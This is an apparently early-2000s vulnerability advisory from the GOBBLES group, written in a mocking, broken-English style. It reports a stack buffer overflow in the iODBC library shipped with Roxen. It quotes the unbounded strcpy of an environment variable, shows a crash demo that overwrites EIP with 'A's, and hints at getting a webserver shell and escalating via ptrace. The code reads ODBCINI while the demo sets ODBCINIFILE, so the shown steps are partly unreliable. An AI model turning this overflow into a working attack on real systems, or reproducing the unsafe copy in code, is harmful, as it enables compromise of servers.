++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! ALERT! A NEW BUFFER OVERFLOW IN LIBRARY FROM ROXEN! ALERT! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ GOBBLES Lab official mascot died today and we all our very sad at the passing of our dear friend Mr. Goldilocks the Goldfish who is no longer with us but except in our memories. GOBBLES would like to take a moment of silence to honor the memory of this brave mascot and wish him well in his future angelic endeavors. You are missed, old friend. PRODUCT ******* Roxen Webserver website: http://www.roxen.com and. . . IODBC database driver website: http://www.iodbc.org (hehehe GOBBLES killing two birds with one stick) BACKGROUD ********* GOBBLES were auditing the Roxen webserver packages for holes that can be used to comprimise servers so that GOBBLES could have the holes patched so that no servers could be comprimised. During this audit a GOBBLES Labs researcher approached GOBBLES with the bug found in IODBC which come with the Roxen and ask GOBBLES to write an advisory on it so that the researcher can go back to finding more bugs in software to present to the security community. from the http://www.roxen.com GOBBLES does paste the following: Roxen WebServer The Roxen Platform is integrated with the open source Roxen WebServer. To function as the company platform and Web content Management system, Roxen WebServer needs the additional tools in Roxen Platform. Those tools are what deliver the real business benefits. [R] [R] then from the http://www.iodbc.org website GOBBLES pastes: [arrwrt.jpg] What is the iODBC ? iODBC is the acronym for Independent Open DataBase Connectivity, an Open Source platform independent implementation of both the ODBC and X/Open specifications. It is rapidly emerging as the industry standard for developing solutions that are language, platform and database independent. [arrwrt.jpg] What is the iODBC Value Proposition ? The ability to develop applications independent of back-end database engine, operating system, and for the most part programming language. Although ODBC and iODBC are both 'C' based Application Programming Interfaces (APIs) there are numerous cross language hooks and bridges from languages such as: C++, Java, Perl, Python, TCL etc. iODBC has been ported to numerous platforms which includes: Linux (x86, Itanium, Alpha, Mips, and StrongArm), Solaris (Sparc & x86), AIX, HP-UX (PA-RISC & Itanium), Digital UNIX, Dynix, Generic UNIX 5.4, FreeBSD, MacOS 9, MacOS X, DG-UX, and OpenVMS. hehehehe look at all the platforms affected here! So now you know! Thanks GOBBLES! SECURITY HISTORY **************** GOBBLES made a GOBBLES Lab Security research research this IODBC much extensively in effort to learn about its security history so that GOBBLES could pay appropriate credit to other researchers who have found bugs in the IODBC prior to this advisory submitted by GOBBLES but nothing was found after the researcher spent over nine hours studying www.google.com probing it for information on the subject. Nothing was discovered by GOBBLES researcher, but this do not mean that IODBC has had no other bugs all it means is that GOBBLES Team was not able to find many information on the history of this product security on the world wide webpage. GOBBLES Labs have got many criticisms on publishing research materials which have been found prior to the rediscovery by GOBBLES members and raises an interesting question to security researchers as to how long a security research must spend researching security history of an software program before starting to study it for new bugs, because what is really more important finding bugs or spending times looking at webpages trying to find out all bugs in software that have already been found? GOBBLES read old issues of securityfocus.com mailing lists looking through other peoples comments on these things and found that very very frequently different researchers will discover same things not knowing the bugs had been found and reported before. Consider following pastes and maybe look at the url if you want also: LOCATION: Neohapsis / Archives / Vuln-Dev / Message Index / Re: Information Leak Bug Discovered in Netscape Mail! From: Markus Kern (markus-kern@gmx.net) Date: Thu Nov 22 2001 - 09:23:17 CST Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] _________________________________________________________________ > We at GOBBLES Research have discovered an insecure condition in Netscape > mail which could assist an attacker in gaining important information > regarding the accounts of those who use the client. "Netscape 'document.referrer' User Information Disclosure Vulnerability" http://www.securityfocus.com/bid/2824 "Originally discovered and posted to Bugtraq by Rop Gonggrijp on March 28, 1998. Rediscovered by 3APA3A <3APA3A@SECURITY.NNOV.RU> on May 30, 2001 and posted to Bugtraq on June 5, 2001." Also advisories with a little less noise would be really cool... -- Markus Kern _________________________________________________________________ http://archives.neohapsis.com/archives/vuln-dev/2001-q4/0540.html Here where it shown that GOBBLES was the last to discover a bug that was first discovered in 1998 and then rediscovered in May of this year by our good friend 3apa3a, and still not a dead bug in November when GOBBLES find it again. From these examples GOBBLES realize that this happen many times and will happen many more times and now GOBBLES calls upon the security community from securityfocus.com and asks the question about how much time should be submitted into reading the world wide web looking for previously disclosed informations. GOBBLES wonder if it is more important to bicker amongst ourselves on the email lists about who found the bug originally and make fun of people and call them idiots for rediscovering an old bug when really the idiot seem to be the vendor for not patching bug when it were first discovered. GOBBLES know it is wrong to take credit for research of others which is what sometimes people say is done when a bug is rediscovered but it is not taking credit for research of others when the research has been done again by someone else to find the bug. Anyhow GOBBLES leave those thoughts with lists for discussion so that the security community can agree on a new standard here and then there will be no future problems with it once everybody have agreed on a new policy. VERSIONS AFFECTED ***************** All versions are believed to be vulnerable since a bug of this epic size could not be done by a modern day smart programmer who understands secure programming so logically GOBBLES assumes that it were introduced in earlier versions of the software done by amatuer programmers who still think bounds checking isn't really important because at worse the program will crash. GOBBLES think that an experienced modern day programmer has understood these things well enough to not do it so GOBBLES logic on this is solid. GOBBLES did only test the most recent version since that downloading all old versions archived of the program would have taken forever to get across to GOBBLES Lab since we can not afford a broadband cablemodem right now for our labs and are on a very slow internet link. If GOBBLES Researchers had downloaded all versions to confirm whether or not it was there. GOBBLES also say it should be noted that the package being audited for bugs were Roxen anyways and the versions of IODBC that ship with the latest build of the Roxen so that may help a new penetrator wanting to construct exploits for all these. THE PROBLEM *********** GOBBLES now show you some hacking. The funtion _iodbcm_getinifile(..) is called from _iodbcdm_getkeyvalbydsn(...) like so: char * _iodbcdm_getkeyvalbydsn ( char *dsn, int dsnlen, char *keywd, char *value, int size) { char pathbuf[1024]; char *path; ... path = _iodbcdm_getinifile (pathbuf, sizeof (pathbuf)); ... } char * _iodbcdm_getinifile (char *buf, int size) { char *ptr; ... if ((ptr = getenv ("ODBCINI")) != NULL) { strcpy (buf, ptr); return buf; } ... } How many times is getinifile() called? Well it is always called when getkeyvalbydsn() is called, so lets do this (eliminating prototypes): GOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc$ grep getkeyval *.c | grep -v "buf, int size" | grep -v char connect.c: ptr = _iodbcdm_getkeyvalbydsn (dsn, dsnlen, "TraceFile", connect.c: ptr = _iodbcdm_getkeyvalbydsn (dsn, dsnlen, "Trace", connect.c: ptr = _iodbcdm_getkeyvalbydsn (szDSN, cbDSN, "Driver", connect.c: drv = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn, connect.c: dsn = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn, connect.c: drv = _iodbcdm_getkeyvalbydsn (dsn, SQL_NTS, "Driver", connect.c: drv = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn, connect.c: dsn = _iodbcdm_getkeyvalinstr (szConnStrIn, cbConnStrIn, connect.c: drv = _iodbcdm_getkeyvalbydsn (dsn, SQL_NTS, "Driver", info.c: _iodbcdm_getkeyvalbydsn (sect[cur_entry], strlen (sect[cur_entry]), misc.c:_iodbcdm_getkeyvalbydsn ( misc.c:_iodbcdm_getkeyvalinstr ( GOBBLES count that add up to 12 (hehe actually GOBBELS cheated cheated and piped to wc -l). GOBBLES looked closer and found that SQLConnect() and SQLDriverConnect() both call it. Since these two functions are the meat of the API GOBBLES think it safe to assume this vulnerability is present every time the library is used. Now lets see what happens... EXPLOIT DETAILS *************** First GOBBLES give glimpse of what happens. GOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc/samples$ export ODBCINIFILE=`perl -e 'print "A"x4000'` GOBBLES@localhost:/usr/local/roxen_1.3.122/libiodbc/samples$ gdb ./odbctest GNU gdb 19990928 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found)... (gdb) run Starting program: /usr/local/roxen_1.3.122/libiodbc/samples/odbctest (no debugging symbols found)...(no debugging symbols found)... OpenLink ODBC Demonstration program This program shows an interactive SQL processor Enter ODBC connect string (? shows list): ? DSN | Description --------------------------------------------------------------- (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg eax 0x64 100 ecx 0xdd8 3544 edx 0x40138960 1075022176 ebx 0xbfffe7f8 -1073747976 esp 0xbfffe7b4 -1073748044 ebp 0x41414141 1094795585 esi 0xbfffe7fa -1073747974 edi 0xbfffe8fc -1073747716 eip 0x41414141 1094795585 eflags 0x210246 2163270 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x4004b431 1074050097 fcs 0x77d0023 125632547 fopo 0xbffffa04 -1073743356 fos 0xffff002b -65493 (gdb) QUIT hehehe do you see where the eip is overwrited with A? Now we own eip and can insert custom GOBBLECODE into the stack to smash it! GOBBLES will leave writing this exploit to the fellow mailing list penetrators as an exercise in programming because GOBBLES does not have a real use for an exploit for this bug right now and doesn't want to waste the precious research minutes writing one for companies to make the money with when all the research is right there for them to use to make their own. For those who do not understand how overflowing IODBC library can be a security problem GOBBLES do ask that you consider what would happen if a badly written php or perl or other kinds of cgi script were made that had a poor open() type call where an evil penetrator could modify the environment to successfully exploit library calls then getting shell access from a more obscure case. GOBBLES say if you are more interested in learning these kind techniques to visit brother rain forest puppy website at the http://www.wiretrip.net/rfp/ and read about complex methods of cgi hacking in rain forest puppy papers. GOBBLES hope that upon successful exploitation of this bug that an attacker can at best get only a uid(webserver) shell although many idiotic webadmin like to make excessive scripts and programs suid root not understanding the problems introduced there. In any case GOBBLES say that if it is only a uid(webserver) shell got then you can probably just ptrace your way to victory hehehehehehe. . . VENDOR NOTIFICATION STATUS ************************** GOBBLES have alerted the Roxen team about the bug and not heard any word back from them about it so GOBBLES is not certain whether or not his research has been read by them yet. GOBBLES have also emailed the iODBC team about their programming problems. SUGGESTED WORKAROUNDS ********************* GOBBLES suggest to fix this and other similar types of program by: 1] Limiting size of data passed through CGI applications to helper applications that may be vulnerable to buffer overflows. Just because a perl and php script are not vulnerable to bufferoverflow does not mean that the helper applications are and GOBBLES wonders why more people do not realize the threat of open() and system() type of calls in nonexploitable code which can be used to exploit exploitable code in other things. 2] Configuring php.ini to disallow the manipulation of any enviornmental variables beyond a few which are important because GOBBLES know that some must be set by php programs but don't let too many! 3] Install mySQL instead of MicroSoft database server eliminating the needs for the use of the IODBC libraries. 4] Install Apache instead of Roxen since Apache have a much greater security history (not in length of problems but greater as in greater strongness against bugs). GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, goverment boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, Legions of Doom, Quentin Tarantino, JUPES, security.nnov.ru and all our friends and family. GOBBLES SECURITY http://www.bugtraq.org